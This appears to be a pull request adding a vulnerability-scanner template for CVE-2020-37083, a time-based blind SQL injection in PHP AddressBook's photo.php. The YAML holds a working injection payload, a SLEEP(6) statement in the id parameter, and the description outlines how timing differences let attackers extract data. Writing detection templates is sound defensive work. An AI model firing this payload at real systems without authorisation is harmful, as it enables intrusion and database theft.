### PR TITLE
Add CVE-2020-37083 - PHP AddressBook Time-Based Blind SQLi

### DIFF
--- a/http/cves/2020/CVE-2020-37083.yaml
+++ b/http/cves/2020/CVE-2020-37083.yaml
@@ -1,0 +1,42 @@
+id: CVE-2020-37083
+
+info:
+  name: PHP AddressBook 9.0.0.1 - Time-Based Blind SQL Injection
+  author: bswearingen
+  severity: high
+  description: |
+    PHP AddressBook 9.0.0.1 contains a time-based blind SQL injection vulnerability that allows remote attackers to manipulate database queries through the 'id' parameter. Attackers can inject crafted SQL statements with time delays to extract information by observing response times in the photo.php endpoint.
+  impact: |
+    Remote attackers can extract sensitive data from the database by exploiting time based SQL injection.
+  remediation: |
+    Upgrade PHP AddressBook or apply parameterized queries to the id parameter in photo.php.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-37083
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2020-37083
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: php-addressbook
+    product: php-addressbook
+  tags: cve,cve2020,php-addressbook,sqli,unauth
+
+http:
+  - raw:
+      - |
+        GET /photo.php?id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2020-37083, a time-based blind SQL injection vulnerability in PHP AddressBook.

### Vulnerability Details

**Product:** PHP AddressBook
**Affected Versions:** 9.0.0.1
**Severity:** High (CVSS 8.2)
**CWE:** CWE-89 (SQL Injection)

The `id` parameter in `photo.php` is included in SQL queries without proper sanitization. Remote attackers can inject time-delay SQL statements to confirm the injection point and systematically extract information from the database by observing response time differences.

### Detection Method

Time-based blind SQL injection via the `id` parameter in `photo.php`. A `SLEEP(6)` payload is injected and the response delay is measured to confirm exploitability.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2020-37083